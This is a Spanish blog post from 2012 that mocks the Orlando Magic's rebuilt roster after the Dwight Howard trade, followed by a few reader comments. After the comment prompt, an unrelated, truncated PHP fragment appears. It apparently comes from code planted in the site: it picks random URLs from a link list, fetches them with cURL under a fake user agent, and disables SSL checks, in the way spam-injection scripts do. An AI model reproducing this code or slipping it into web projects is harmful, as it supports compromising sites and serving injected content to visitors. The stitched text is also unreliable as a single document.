Orlando Magic: El reverso tenebroso de Disneylandia

02 de October de 2012 por TheDeerHunter

…O cómo hacer ver que el pato Donald es el General Manager de tu franquicia.

Perdonad mi ignorancia. En ocasiones mis humildes conocimientos baloncestísticos no alcanzan a vislumbrar ni remotamente las intenciones de los estupendamente remunerados ejecutivos de la NBA. En menos de un lustro Orlando ha pasado de disputar el anillo, con una de las plantillas más profundas, compensadas, versátiles y potentes de la competición a… lo que sea que se llame esto. Estoy seguro de que los Magic van a presentar en algunos partidos alineaciones sensiblemente inferiores a las más “recordadas” de los Bobcats del año pasado.

Las comparaciones son odiosas pero… ¿recordamos qué sacó Denver por Melo en una situación similar a la de Howard? ¿Hemos estado al tanto de todo lo que han ido rechazando los Magic estos los últimos meses? ¿Se puede hacer peor, madre mía?

A algunos se les iluminó la mirada el día que por fin decidieron largar a Othis Smith pero entonces… ¡Zas, en toda la boca! Operación Howard: el pívot a cambio de Afflalo (caro), Harrington (tóxico), Eyenga&McRoberts (muajauajaa), Vucevic y Harkless… Un WTF en toda regla. Delirante.

Uno se tira a la cara la tabla de altas y bajas y dan ganas de echarse a llorar. Claros candidatos al mayor número de papeletas para la lotería el verano próximo. Si ese era el objetivo se les ha ido la mano. Una plantilla bastante menos penosa seguramente hubiera bastado.

Nulo presente y, a no ser que peguen el bombazo padre en el próximo draft, escaso futuro aparente. Una plantilla de casi 85 millones de dólares (contabilizando el sueldo fantasma de Arenas) confeccionada íntegramente por gregarios, en manos de un técnico novicio como Jacque Vaughn. Le deseamos toda la suerte que le va a hacer falta.

En mi opinión, Orlando posee ahora mismo el peor perímetro de la liga. Hace tiempo que muchos dudamos de si Turkoglu mantiene nivel NBA. Lo que el turco hace año tras año desde estampar su firma en cierto contrato parece tratar de convencernos rotundamente de que no. Será titular, me temo. De Jameer Nelson conocemos sus virtudes y carencias. El año pasado fue de menos a más y terminó dignamente. Siempre sostuve que me parecía un buen suplente para un equipo aspirante. Ahora, sin embargo, me parece un base correcto para quienes aspiran a lo que aspiran. Veremos qué papel asume Aaron Afflalo, hasta ahora secundariamente secundario a pesar de lo que cobra. Muchas dudas de que pueda sacar a nadie ni de pobres ni de ricos. Completarán la rotación gente como JJ Redick, Quentin Richardson, Ishmael Smith, Eyenga, E’twaun Moore, Harkless… Exceptuando al primero son elementos que apenas olerían minutos en algún otro lugar. Tiemblo al imaginar una hipotética lesión en alguno de los teóricos titulares.

Por dentro andan algo mejor armados. Davis, Ayón, Harrington y Vucevic son buenos elementos, pero no creo que tanto para tirar del carro. No creo que mejoren el rendimiento del Howard-Anderson del año pasado, que tampoco fue un pasote increíble precisamente. McRoberts, Justin Harper y los rookies no creo que aporten apenas nada.

En definitiva, malos tiempos para la lírica en Florida. No queda otra que solidarizarse con los fans de la franquicia. Ánimo chavales. El sol brillará… mañana.

Altas: Ayón, Afflalo, Harrington, Vucevic, Harkless, McRoberts, Eyenga, Andrew Nicholson, Kyle O’Quinn
Bajas: Howard, Anderson, Jason Richardson, Von Wafer, Earl Clark, Duhon, Orton

Quinteto: Nelson, Afflalo, Turkoglu, Davis, Ayón/Vucevic
6º Hombre: Al Harrington

Pronóstico: Últimos

Comenta

54 comentarios a esta entrada

  1. melo15 dice:
    #1

    Lo bueno que tiene la NCAA es que es una liga que se va oxigenando y siempre tienes nuevos jugadores que ver ademas del aliciente de que despues los podras ver en la NBA.
    Nose vosotros pero para mi es mas emocionante ver a un tio de 19 años liderando a una Universidad que un grupo de jugadores que basan su ataque en el Pick & Roll y el triple (madrid) , porque siempre es lo mismo.

      Citar

  2. Alfredo dice:
    #2

    Una cosa esta clara, el GM de los Magic se pasa el dia entero jugando al solitario o a Ludoteka, y cuando le pidieron que hiciera algo, agarro los cromos NBA, los lanzo al aire y agarro Afflalo, Harrington, Eyenga, McRoberts etc como podia haber agarrado Scalabrines y Cardinales de la vida. Criterio, 0 y planificacion -2

      Citar

  3. Jose Luis dice:
    #3

    ¿ Creéis que Harrington aguantará en Orlando toda la temporada? Es que aún le quedan 3 años de contrato, ni siquiera es un expiring por el que negociar el próximo año… y es un jugador que puede dar muchos minutos de calidad a un equipo de PO e incluso a un contender

      Citar

  4. MagicJohnson32 dice:
    #4

    La idea de los Magic seguro que es traspasarlo, pero primero habrá que ver cómo anda de físico y, después, qué esperan recibir por él.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>